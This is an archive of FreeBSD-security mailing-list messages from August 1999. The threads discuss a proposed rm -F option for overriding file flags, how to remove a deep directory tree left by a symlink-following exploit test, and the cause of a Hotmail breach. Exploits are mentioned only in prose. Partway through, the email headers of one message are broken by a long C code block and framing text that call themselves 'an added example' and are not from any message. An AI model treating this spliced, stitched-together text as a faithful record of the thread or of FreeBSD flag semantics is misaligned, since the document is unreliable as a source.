bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id MAA01906; Tue, 31 Aug 1999 12:00:57 +1000 Date: Tue, 31 Aug 1999 12:00:57 +1000 
From: Bruce Evans
Message-Id: <199908310200.MAA01906@godzilla.zeta.org.au>
To: freebsd@gndrsh.dnsmgr.net, imp@village.org
Subject: Re: Not sure if you got it...
Cc: bde@zeta.org.au, dynamo@ime.net, security@FreeBSD.ORG

>> I'd also like to have a new flag to rm. -F. One -F will be
>> chflags nouflags foo ; rm -f foo
>> while two -F will be
>> chflags 0 foo ; rm -f foo
>
>I have a problem with this, it means updating 1 more chunk of code
>should the set of items in uflags change.

Interesting point. Support for removing user flags has already rotted
in rm. The UF_NOUNLINK flag was added on 1997/06/02 but rm -rf still
doesn't clear it.

Support for the nounlnk flags is also broken in chflags and ls.
The flags are negative logic, like UF_NODUMP, and this is consistently
handled backwards (nodump was only backwards in the manpage). Thus you
have to say `chflags uunlnk ...' to set the _NO_ uunlnk flag, and ls
tells you that the uunlnk flag is set despite there being no such flag.
The abbreviation uunlink as uunlnk doesn't help.

Bruce

From owner-freebsd-security Mon Aug 30 19:04:59 1999
Date: Tue, 31 Aug 1999 12:02:22 +1000
From: Bruce Evans
Message-Id: <199908310202.MAA02098@godzilla.zeta.org.au>
To: freebsd@gndrsh.dnsmgr.net, imp@village.org
Subject: Re: Not sure if you got it...
Cc: bde@zeta.org.au, dynamo@ime.net, security@FreeBSD.ORG

>: > while two -F will be
>: > chflags 0 foo ; rm -f foo
>:
>: I have a problem with this, it means updating 1 more chunk of code
>: should the set of items in uflags change.
>
>I was going to define something like UF_USERFLAGS and SF_SYSFLAGS as
>well...

Use the standard macros UF_SETTABLE and SF_SETTABLE.

Bruce

From owner-freebsd-security Mon Aug 30 19:12:33 1999
Message-Id: <199908310211.UAA08438@harmony.village.org>
To: Bruce Evans
Subject: Re: Not sure if you got it...
Cc: freebsd@gndrsh.dnsmgr.net, dynamo@ime.net, security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 31 Aug 1999 12:02:22 +1000." <199908310202.MAA02098@godzilla.zeta.org.au>
References: <199908310202.MAA02098@godzilla.zeta.org.au>
Date: Mon, 30 Aug 1999 20:11:29 -0600
From: Warner Losh

In message <199908310202.MAA02098@godzilla.zeta.org.au> Bruce Evans writes:
: Use the standard macros UF_SETTABLE and SF_SETTABLE.

I'm silly for not seeing them...

Warner

From owner-freebsd-security Tue Aug 31 00:22:08 1999
From: "Rodney W. Grimes"
Message-Id: <199908310720.AAA68164@gndrsh.dnsmgr.net>
Subject: Re: Not sure if you got it...
In-Reply-To: <199908310200.MAA01906@godzilla.zeta.org.au> from Bruce Evans at "Aug 31, 1999 12:00:57 pm"
To: bde@zeta.org.au (Bruce Evans)
Date: Tue, 31 Aug 1999 00:20:40 -0700 (PDT)
Cc: imp@village.org, dynamo@ime.net, security@FreeBSD.ORG

> >> I'd also like to have a new flag to rm. -F. One -F will be
> >> chflags nouflags foo ; rm -f foo
> >> while two -F will be
> >> chflags 0 foo ; rm -f foo
> >
> >I have a problem with this, it means updating 1 more chunk of code
> >should the set of items in uflags change.
>
> Interesting point. Support for removing user flags has already rotted
> in rm. The UF_NOUNLINK flag was added on 1997/06/02 but rm -rf still
> doesn't clear it.

Actually I think that was done on purpose. Since UF_NOUNLINK is to
protect the user from removing the file it would kinda make sense
that rm -rf should bitch loudly when asked to rm a UF_NOUNLINK flagged
file shouldn't it?

IMHO, rm should not know about flags at all. chflags knows about flags,
and if we ever get acl's rm should not be taught about them either,
some other command (acl(1) anyone) will know how to deal with them.

> Support for the nounlnk flags is also broken in chflags and ls.
> The flags are negative logic, like UF_NODUMP, and this is consistently
> handled backwards (nodump was only backwards in the manpage). Thus you
> have to say `chflags uunlnk ...' to set the _NO_ uunlnk flag, and ls
> tells you that the uunlnk flag is set despite there being no such flag.
> The abbreviation uunlink as uunlnk doesn't help.
Can I simply state that ``flags'' are broken in general, the concept
was not well thought out as to orthogonality, implementation impacts
and completeness. It's a poor man's attempt to bandaid in 6 or so
fixed valued acl's. I know it is all we've got, and I suppose that
something is better than nothing, _until_ (and it has just been pointed
out again how to use these for DOS) they cause security problems. As
far as I am concerned the whole flags thing should die a quick and ugly
death as non functional bloat with serious security concerns being the
#1 reason.

--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Tue Aug 31 07:50:50 1999
Message-Id: <199908311450.IAA11239@harmony.village.org>
To: "Rodney W. Grimes"
Subject: Re: Not sure if you got it...
Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 31 Aug 1999 00:20:40 PDT." <199908310720.AAA68164@gndrsh.dnsmgr.net>
References: <199908310720.AAA68164@gndrsh.dnsmgr.net>
Date: Tue, 31 Aug 1999 08:50:15 -0600
From: Warner Losh

In message <199908310720.AAA68164@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes:
: Actually I think that was done on purpose. Since UF_NOUNLINK is to
: protect the user from removing the file it would kinda make sense
: that rm -rf should bitch loudly when asked to rm a UF_NOUNLINK flagged
: file shouldn't it?
:
: IMHO, rm should not know about flags at all. chflags knows about flags,
: and if we ever get acl's rm should not be taught about them either,
: some other command (acl(1) anyone) will know how to deal with them.

Yes, but if force doesn't mean try your best to delete it, then it is
kinda useless... There are times that policy is to kill everything,
flags to the contrary notwithstanding.

Warner

From owner-freebsd-security Tue Aug 31 08:57:20 1999
Date: Tue, 31 Aug 1999 10:56:40 -0500 (CDT)
From: Frank Tobin
To: FreeBSD-security Mailing List
Subject: Re: Not sure if you got it...
In-Reply-To: <199908311450.IAA11239@harmony.village.org>

Warner Losh, at 08:50 on Tue, 31 Aug 1999, wrote:

> : IMHO, rm should not know about flags at all. chflags knows about flags,
> : and if we ever get acl's rm should not be taught about them either,
> : some other command (acl(1) anyone) will know how to deal with them.
>
> Yes, but if force doesn't mean try your best to delete it, then it is
> kinda useless... There are times that policy is to kill everything,
> flags to the contrary notwithstanding.

Correct me if these analyses are incorrect, but it seems we have a couple
options here to remove entire structures with flags inside of it:

1) Give rm -F. This would perform as per the proposal. The arguments
against this seem to be that this breaks traditional unix philosophy of
atomic elements.

2) Have rm -rf automatically remove flags. The arguments against this are
that some flags could be used as protectors/dummy-resistant flags, to
prevent accidental removal of file.

3) Use chflags -R , followed by rm -rf. This two step
process is consistent with unix philosophy. This is probably the cleanest
(traditionally) solution. However, it causes two disk passes instead of
one.

4) Use find(1) with -exec chflags and rm. This has the downside of many
processes getting started (one chflags and one rm for each node), and
again, more disk usage (we don't all use SCSI yet).

Additionally, solutions 3 and 4 have the downside of having to train users
to remember to use such a multiple-step pass in scripts and such; if these
implementations are chosen, the need to remove flags with chflags(1)
should be documented in the manpage of rm(1) under the -f option (or
BUGS).
Personally, I vote for solution 1), adding a -F flag. Since we added
flags to the filesystem, we should have a means to forcibly override
them also (where appropriate), when we know we have to override them.
Since I don't like 3) and 4), and 2) is dangerous, I have to settle on
1).

One problem with my position, though, is that we have to consider what
happens if we add flags like 'noread'. Should cp(1) be able to override
this? Currently, this is just a hypothetical situation, but one should
at least try to be a little consistent in design (which is why I love
having -R available for most operations; no other OS seems to have -R
for tools such as grep).

--
Frank Tobin                     "To learn what is good and what is to be
www.neverending.org/~ftobin     valued, those truths which cannot be shaken
                                or changed."  Myst: The Book of Atrus

PGPenvelope = GPG and PGP5 + Pine      www.neverending.org/~ftobin/resources.html
PGP: 4F86 3BBB A816 6F0A 340F 6003 56FF D10A 260C 4FA3

From owner-freebsd-security Tue Aug 31 13:08:33 1999
From: "Rodney W. Grimes"
Message-Id: <199908312007.NAA72350@gndrsh.dnsmgr.net>
Subject: Re: Not sure if you got it...
In-Reply-To: <199908311450.IAA11239@harmony.village.org> from Warner Losh at "Aug 31, 1999 08:50:15 am"
To: imp@village.org (Warner Losh)
Date: Tue, 31 Aug 1999 13:07:43 -0700 (PDT)
Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG

> In message <199908310720.AAA68164@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes:
> : Actually I think that was done on purpose. Since UF_NOUNLINK is to
> : protect the user from removing the file it would kinda make sense
> : that rm -rf should bitch loudly when asked to rm a UF_NOUNLINK flagged
> : file shouldn't it?
> :
> : IMHO, rm should not know about flags at all. chflags knows about flags,
> : and if we ever get acl's rm should not be taught about them either,
> : some other command (acl(1) anyone) will know how to deal with them.
>
> Yes, but if force doesn't mean try your best to delete it, then it is
> kinda useless...

Ahhh.. you said it not me... one more misconceived and not easily
correctly implemented option.

> There are times that policy is to kill everything,
> flags to the contrary notwithstanding.

Unix commands should not implement policy, only methods.
--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Tue Aug 31 13:57:33 1999
Message-ID: <19990831205352.21053.qmail@alice.gba.oz.au>
X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30
Date: Wed, 01 Sep 1999 06:53:51 +1000
From: Greg Black
To: Frank Tobin
Cc: FreeBSD-security Mailing List
Subject: Re: Not sure if you got it...
In-reply-to: of Tue, 31 Aug 1999 10:56:40 EST

> Correct me if these analyses are incorrect, but it seems we have a couple
> options here to remove entire structures with flags inside of it:
>
> 1) Give rm -F. This would perform as per the proposal. The arguments
> against this seem to be that this breaks traditional unix philosophy of
> atomic elements.
>
> 2) Have rm -rf automatically remove flags. The arguments against this are
> that some flags could be used as protectors/dummy-resistant flags, to
> prevent accidental removal of file.

I'm against the first two for the reasons given.

> 3) Use chflags -R , followed by rm -rf. This two step
> process is consistent with unix philosophy. This is probably the cleanest
> (traditionally) solution. However, it causes two disk passes instead of
> one.

This one should be expressed more like:

    rm -rf dir || {
        echo second pass to remove flags
        chflags -R nouserflags dir
        rm -rf dir
    }

This way, it's only a single pass in the common case where there are no
files with flags that stop the rm. The chflags pass will only find the
few files with flags set as the rest have already been removed. This
makes clear what is happening and at least acknowledges that certain
flags are *supposed* to stop rm.

> 4) Use find(1) with -exec chflags and rm. This has the downside of many
> processes getting started (one chflags and one rm for each node), and
> again, more disk usage (we don't all use SCSI yet).

This one sucks.
> Additionally, solutions 3 and 4 have the downside of having to train users
> to remember to use such a multiple-step pass in scripts and such; if these
> implementations are chosen, the need to remove flags with chflags(1)
> should be documented in the manpage of rm(1) under the -f option (or
> BUGS).

The users who need to learn how to deal with flags had to learn how to
enable them in the first place. There's not much new training to do,
and it can be managed by minor additions to the relevant man pages.

One additional reason not to put flag-changing capabilities in rm is
that flags are, by design, intended to prevent certain uses of rm. For
instance, if an admin wants to put an empty .rhosts file in users' home
directories he can do this by making it root-owned with the uchg flag.
The user can still write in (and remove files from) his home dir, but
he cannot remove that file.

The thing that is really wrong with the flags is the absurd names they
have been given as in these two examples:

 * nodump sets a flag, dump unsets it
 * uchg sets a flag, nouchg unsets it

It would have made much more sense if the second one was changed so
that:

 * nodump still sets a flag, while dump unsets it
 * nouchg sets a flag ("user flag for no change"), uchg unsets it

Of course, changing things like this once the bad design has escaped is
non-trivial.
--
Greg Black

From owner-freebsd-security Tue Aug 31 18:23:24 1999
Date: Wed, 1 Sep 1999 03:23:16 +0200
From: Markus Holmberg
To: freebsd-security@freebsd.org
Subject: how to remove directories made by the core-following-symlink test code?
Message-ID: <19990901032316.A8300@montezuma.acc.umu.se>

Wanted to test if the 2.2.8-STABLE production box here was vulnerable, so I
compiled and executed with the deep dir structure as a result..

Am I missing something very trivial here, or how am I supposed to
remove the very deep directory structure that was made by the
core-follow-symlink test/exploit/whatever code?

A normal "rm -rf " won't do it.. It ends with lots of these:

******* CUT ******
rm: 13456/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: Directory not empty
rm: 13456/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! : Directory not empty
rm: 13456: Directory not empty
******* CUT ******

Tried everything I could think of! Any help is appreciated..! :)
(don't want /etc/security to core dump each and every night :/)

Markus

--
Markus Holmberg | Give me UNIX or give me a typewriter.
saska@acc.umu.se | http://www.freebsd.org

From owner-freebsd-security Tue Aug 31 18:52:21 1999
Message-ID: <19990901034954.A18062@foobar.franken.de>
Date: Wed, 1 Sep 1999 03:49:54 +0200
From: Harold Gutch
To: Markus Holmberg , freebsd-security@FreeBSD.ORG
Subject: Re: how to remove directories made by the core-following-symlink test code?
References: <19990901032316.A8300@montezuma.acc.umu.se>
In-Reply-To: <19990901032316.A8300@montezuma.acc.umu.se>; from Markus Holmberg on Wed, Sep 01, 1999 at 03:23:16AM +0200

On Wed, Sep 01, 1999 at 03:23:16AM +0200, Markus Holmberg wrote:
> Wanted to test if the 2.2.8-STABLE production box here was vulnerable, so I
> compiled and executed with the deep dir structure as a result..
>
> Am I missing something very trivial here, or how am I supposed to
> remove the very deep directory structure that was made by the
> core-follow-symlink test/exploit/whatever code?
>
> A normal "rm -rf " won't do it..
>

I had the same problem - my (quick) solution was something like

    while (true)
    do
        mv * a && cd a
    done

which would rename every directory to "a" (as every directory contains
only a single subdirectory), which then could be removed with "rm -rf ".

bye,
  Harold

--
Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998
#unix, ircnet

From owner-freebsd-security Tue Aug 31 19:55:48 1999
Message-ID: <37CC959B.9CA5F03A@stlinux.ouhk.edu.hk>
Date: Wed, 01 Sep 1999 10:55:23 +0800
From: Peter Kok
To: security@freebsd.org
Subject: hotmail

Hello all

I heard from news that hotmail was broken and the service was forced to
stop about two hours. As I know hotmail is operated by freebsd. Is it
about the security of freebsd?
Now I would like to know more about security of freebsd.

thank you

regards
Peter

From owner-freebsd-security Tue Aug 31 20:00:26 1999
Date: Tue, 31 Aug 1999 20:00:24 -0700 (PDT)
From: Kris Kennaway
To: Peter Kok
Cc: security@freebsd.org
Subject: Re: hotmail
In-Reply-To: <37CC959B.9CA5F03A@stlinux.ouhk.edu.hk>

On Wed, 1 Sep 1999, Peter Kok wrote:

> Hello all
>
> I heard from news that hotmail was broken and the service was forced to
> stop about two hours. As I know hotmail is operated by freebsd. Is it
> about the security of freebsd?

Almost certainly not - despite Microsoft's claims of it being a hacker,
it's much more likely that the original cause was a boneheaded CGI error
by a hotmail programmer. A tool (like an OS) is only as good as the
craftsman who wields it.

> Now I would like to know more about security of freebsd.

What do you want to know?

Kris

From owner-freebsd-security Tue Aug 31 20:01:01 1999
Date: Tue, 31 Aug 1999 20:03:26 -0700 (PDT)
From: Kevin Lynn
To: Peter Kok
Cc: security@freebsd.org
Subject: Re: hotmail
In-Reply-To: <37CC959B.9CA5F03A@stlinux.ouhk.edu.hk>

Yes.. but chances are it's because of a security hole that wasn't because
of freebsd as slashdot posted something about the security hole being
exploitable via some web page that would let you read other people's mail.

Kevin

On Wed, 1 Sep 1999, Peter Kok wrote:

> Hello all
>
> I heard from news that hotmail was broken and the service was forced to
> stop about two hours. As I know hotmail is operated by freebsd. Is it
> about the security of freebsd?
> Now I would like to know more about security of freebsd.
>
> thank you
>
> regards
> Peter

From owner-freebsd-security Tue Aug 31 20:13:38 1999
Date: Tue, 31 Aug 1999 20:12:31 -0700 (PDT)
From: Liam Slusser
To: Kevin Lynn
Cc: Peter Kok , security@FreeBSD.ORG
Subject: Re: hotmail

I thought hotmail was using Sun hardware running Solaris? Anybody
know?

liam

System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage
www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address
Lowered turbo powered Honda Civic's are really cool. <---------- my quote

On Tue, 31 Aug 1999, Kevin Lynn wrote:

> Yes.. but chances are it's because of a security hole that wasn't because
> of freebsd as slashdot posted something about the security hole being
> exploitable via some web page that would let you read other people's mail.
>
> Kevin
>
> On Wed, 1 Sep 1999, Peter Kok wrote:
>
> > Hello all
> >
> > I heard from news that hotmail was broken and the service was forced to
> > stop about two hours. As I know hotmail is operated by freebsd. Is it
> > about the security of freebsd?
> > Now I would like to know more about security of freebsd.
> >
> > thank you
> >
> > regards
> > Peter

From owner-freebsd-security Tue Aug 31 20:14:50 1999
Date: Wed, 1 Sep 1999 13:14:38 +1000
From: Bruce Evans
Message-Id: <199909010314.NAA11599@godzilla.zeta.org.au>
To: ftobin@uiuc.edu, gjb-freebsd@gba.oz.au
Subject: Re: Not sure if you got it...
Cc: freebsd-security@FreeBSD.ORG

>The thing that is really wrong with the flags is the absurd
>names they have been given as in these two examples:
>
> * nodump sets a flag, dump unsets it
> * uchg sets a flag, nouchg unsets it
>
>It would have made much more sense if the second one was changed
>so that:
>
> * nodump still sets a flag, while dump unsets it
> * nouchg sets a flag ("user flag for no change"), uchg unsets it

The immutable flags are well named in the kernel. You can still spell
the user immutable flag as `immutable' in chflags(8), but ls(1) will
print it as `uchg'. The only purpose of the bad abbreviations seems to
be to limit line lengths in ls -lo listings.

Bruce

From owner-freebsd-security Tue Aug 31 20:22:13 1999
Message-ID: <37CC9BC7.45CE961E@confusion.net>
Date: Tue, 31 Aug 1999 23:21:43 -0400
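The rm -F proposal (one -F as "chflags nouflags; rm -f", two as "chflags 0; rm -f"), Bruce's UF_SETTABLE/SF_SETTABLE point and the negative-logic keyword names discussed in this thread, worked through as an added C example that is not code from any message above. The flag values and keyword spellings are FreeBSD's (sys/stat.h and chflags(1)); the functions are hypothetical, and parent-directory flags and securelevel are not modelled.

```c
/* Added example, not from any message in this thread: how a file's
 * st_flags word interacts with "chflags" and a later "rm -f", i.e. the
 * proposed one-F ("chflags nouflags") and two-F ("chflags 0") levels,
 * via UF_SETTABLE/SF_SETTABLE rather than a hand-kept list.  Flag values
 * and keyword spellings are FreeBSD's (sys/stat.h, chflags(1)); the
 * functions are hypothetical; parent-dir flags/securelevel not modelled. */
#include <stdio.h>
#include <string.h>

#define UF_SETTABLE  0x0000ffffu   /* owner-changeable flags     */
#define UF_NODUMP    0x00000001u
#define UF_IMMUTABLE 0x00000002u
#define UF_APPEND    0x00000004u
#define UF_OPAQUE    0x00000008u
#define UF_NOUNLINK  0x00000010u
#define SF_SETTABLE  0xffff0000u   /* superuser-changeable flags */
#define SF_ARCHIVED  0x00010000u
#define SF_IMMUTABLE 0x00020000u
#define SF_APPEND    0x00040000u
#define SF_NOUNLINK  0x00100000u
#define BAD_KEYWORD  ((unsigned)-1)

/* Keywords as chflags(1) takes and "ls -lo" prints them.  "nodump",
 * "uunlnk" and "sunlnk" name bits with a negative meaning, the mismatch
 * the thread complains about: "nouunlnk" clears the no-unlink bit. */
static const struct { unsigned bit; const char *name; } names[] = {
    { SF_ARCHIVED,  "arch"   }, { UF_OPAQUE,    "opaque" },
    { UF_NODUMP,    "nodump" }, { SF_APPEND,    "sappnd" },
    { SF_IMMUTABLE, "schg"   }, { SF_NOUNLINK,  "sunlnk" },
    { UF_APPEND,    "uappnd" }, { UF_IMMUTABLE, "uchg"   },
    { UF_NOUNLINK,  "uunlnk" },
};
#define NNAMES (sizeof names / sizeof names[0])

/* Render flags the way "ls -lo" does: comma list, or "-" when none set.
 * Returns 0, or -1 if buf is too small. */
int flags_to_str(unsigned flags, char *buf, size_t len)
{
    size_t n = 0;
    if (len < 2) return -1;
    buf[0] = '\0';
    for (size_t i = 0; i < NNAMES; i++) {
        if (!(flags & names[i].bit)) continue;
        int w = snprintf(buf + n, len - n, "%s%s", n ? "," : "", names[i].name);
        if (w < 0 || (size_t)w >= len - n) return -1;
        n += (size_t)w;
    }
    if (n == 0) strcpy(buf, "-");
    return 0;
}

/* Apply a chflags(1)-style list to cur: "uchg,nodump" sets, "no<name>"
 * clears, "0" clears everything; "dump" is the clearing spelling of
 * "nodump".  Returns the new word, or BAD_KEYWORD on an unknown word. */
unsigned apply_keywords(unsigned cur, const char *spec)
{
    char copy[256];
    if (strlen(spec) >= sizeof copy) return BAD_KEYWORD;
    strcpy(copy, spec);
    if (strcmp(copy, "0") == 0) return 0;
    for (char *tok = strtok(copy, ","); tok; tok = strtok(NULL, ",")) {
        const char *name = tok;
        int clear = 0;
        if (strcmp(tok, "dump") == 0) { name = "nodump"; clear = 1; }
        else if (!strncmp(tok, "no", 2) && strcmp(tok, "nodump")) {
            name = tok + 2; clear = 1;
        }
        unsigned bit = 0;
        for (size_t i = 0; i < NNAMES; i++)
            if (strcmp(names[i].name, name) == 0) bit = names[i].bit;
        if (bit == 0) return BAD_KEYWORD;
        cur = clear ? (cur & ~bit) : (cur | bit);
    }
    return cur;
}

/* Flags on the file itself that make unlink(2) fail with EPERM (the
 * immutable, append-only and no-unlink bits of both halves); nodump,
 * opaque and arch do not stop rm. */
unsigned unlink_blockers(unsigned flags)
{
    return flags & (UF_IMMUTABLE | UF_APPEND | UF_NOUNLINK |
                    SF_IMMUTABLE | SF_APPEND | SF_NOUNLINK);
}

/* Proposed force levels: 0 = plain "rm -f"; 1 = "chflags nouflags; rm -f"
 * (clears UF_SETTABLE); 2 = "chflags 0; rm -f" (SF_SETTABLE too, which
 * only root may clear).  Returns the flags that still block the unlink. */
unsigned rm_force_level(unsigned flags, int level, int is_root)
{
    unsigned clear = 0;
    if (level >= 1) clear |= UF_SETTABLE;
    if (level >= 2 && is_root) clear |= SF_SETTABLE;
    return unlink_blockers(flags & ~clear);
}
```

With a constructed file carrying uunlnk,nodump (owner-set) and schg (root-set), level 1 still leaves schg blocking the unlink and only level 2 as root clears it, which is Warner's two-level proposal and Rodney's objection in one table.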
From: Laurence Berland
Organization: B.R.A.T.T.
To: Liam Slusser
Cc: Kevin Lynn , Peter Kok , security@FreeBSD.ORG
Subject: Re: hotmail

Last I heard the frontend that served up the pages was FreeBSD, and the
mail backend for incoming and outgoing mail was Solaris. BTW the
exploit was just telling the cgi script you wanted the post-login page
or some page just after login that you wanted that page, and it just
assumed that you were already authenticated (which you weren't).
Nothing to do with freebsd, just a bad cgi program.

Liam Slusser wrote:
>
> I thought hotmail was using Sun hardware running Solaris? Anybody
> know?
>
> liam
>
> System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage
> www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address
> Lowered turbo powered Honda Civic's are really cool. <---------- my quote
>
> On Tue, 31 Aug 1999, Kevin Lynn wrote:
>
> > Yes.. but chances are it's because of a security hole that wasn't because
> > of freebsd as slashdot posted something about the security hole being
> > exploitable via some web page that would let you read other people's mail.
> >
> > Kevin
> >
> > On Wed, 1 Sep 1999, Peter Kok wrote:
> >
> > > Hello all
> > >
> > > I heard from news that hotmail was broken and the service was forced to
> > > stop about two hours. As I know hotmail is operated by freebsd. Is it
> > > about the security of freebsd?
> > > Now I would like to know more about security of freebsd.
> > >
> > > thank you
> > >
> > > regards
> > > Peter
> > >
> > > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > > with "unsubscribe freebsd-security" in the body of the message
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
Laurence Berland, Stuyvesant HS Debate
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
Windows 98: n. useless extension to a minor patch release for 32-bit
extensions and a graphical shell for a 16-bit patch to an 8-bit operating
system originally coded for a 4-bit microprocessor, written by a 2-bit
company that can't stand for 1 bit of competition.
http://stuy.debate.net
icq #7434346
aol imer E1101
The above email Copyright (C) 1999 Laurence Berland
All rights reserved

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Aug 31 20:31:27 1999
Delivered-To: freebsd-security@freebsd.org
Received: from magnesium.net (toxic.magnesium.net [204.188.6.238]) by hub.freebsd.org (Postfix) with SMTP id 94D351544E for ; Tue, 31 Aug 1999 20:31:23 -0700 (PDT) (envelope-from unfurl@magnesium.net)
Received: (qmail 8699 invoked by uid 1001); 1 Sep 1999 03:30:22 -0000
Date: Tue, 31 Aug 1999 20:30:22 -0700
From: Bill Swingle
To: Laurence Berland
Cc: Liam Slusser, Kevin Lynn, Peter Kok, security@FreeBSD.ORG
Subject: Re: hotmail
Message-ID: <19990831203022.A8558@dub.net>
References: <37CC9BC7.45CE961E@confusion.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
In-Reply-To: <37CC9BC7.45CE961E@confusion.net>; from Laurence Berland on Tue, Aug 31, 1999 at 11:21:43PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is correct. Hotmail has ~1800 FreeBSD boxen as webservers and their
database stuff is run on Sun boxen running Solaris.

-Bill

On Tue, Aug 31, 1999 at 11:21:43PM -0400, Laurence Berland wrote:
> Last I heard the frontend that served up the pages was FreeBSD, and the
> mail backend for incoming and outgoing mail was Solaris.  BTW the
> exploit was just telling the cgi script you wanted the post-login page
> or some page just after login that you wanted that page, and it just
> assumed that you were already authenticated (which you weren't).
> Nothing to do with freebsd, just a bad cgi program.
>
> Liam Slusser wrote:
> >
> > I thought hotmail was using Sun hardware running Solaris?  Anybody
> > know?
> >
> > liam

--
-=| --- B i l l   S w i n g l e --- http://www.dub.net/
-=| unfurl@dub.net - unfurl@freebsd.org - bill@cdrom.com
-=| Different all twisty a of in maze are you, passages little

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Aug 31 20:32:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 8A9171546E for ; Tue, 31 Aug 1999 20:32:38 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA67875; Tue, 31 Aug 1999 20:31:34 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: Liam Slusser
Cc: Kevin Lynn, Peter Kok, security@FreeBSD.ORG
Subject: Re: hotmail
In-reply-to: Your message of "Tue, 31 Aug 1999 20:12:31 PDT."
Date: Tue, 31 Aug 1999 20:31:34 -0700
Message-ID: <67872.936156694@localhost>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> I thought hotmail was using Sun hardware running Solaris?  Anybody
> know?

They're using both.  FreeBSD runs the front end, Solaris runs the back end.

- Jordan

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Aug 31 20:38:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 7CCAC15256 for ; Tue, 31 Aug 1999 20:38:38 -0700 (PDT) (envelope-from hart@iserver.com)
Received: by gatekeeper.veriohosting.com; Tue, 31 Aug 1999 21:38:09 -0600 (MDT)
Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma022076; Tue, 31 Aug 99 21:37:49 -0600
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id VAA21089; Tue, 31 Aug 1999 21:36:44 -0600 (MDT)
Date: Tue, 31 Aug 1999 21:36:44 -0600 (MDT)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
Reply-To: Paul Hart
To: Markus Holmberg
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: how to remove directories made by the core-following-symlink test code?
In-Reply-To: <19990901032316.A8300@montezuma.acc.umu.se>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 1 Sep 1999, Markus Holmberg wrote:

> Am I missing something very trivial here, or how am I supposed to do to
> remove the very deep directory structure that was made by the
> core-follow-symlink test/exploit/whatever code?

Try a version of rm that does not use the fts(3) routines to traverse the
directory tree.  I found that the GNU rm in the fileutils package worked
for me.  You can get the package at:

ftp://ftp.gnu.org/pub/gnu/fileutils/

You could also write a quick recursive remover with readdir(3) and friends.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Aug 31 21:25:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 12FC61509A for ; Tue, 31 Aug 1999 21:25:20 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11M1w4-0004L2-00; Tue, 31 Aug 1999 22:23:48 -0600
Message-ID: <37CCAA52.74E1C9D1@softweyr.com>
Date: Tue, 31 Aug 1999 22:23:46 -0600
From: Wes Peters
Organization: Softweyr LLC
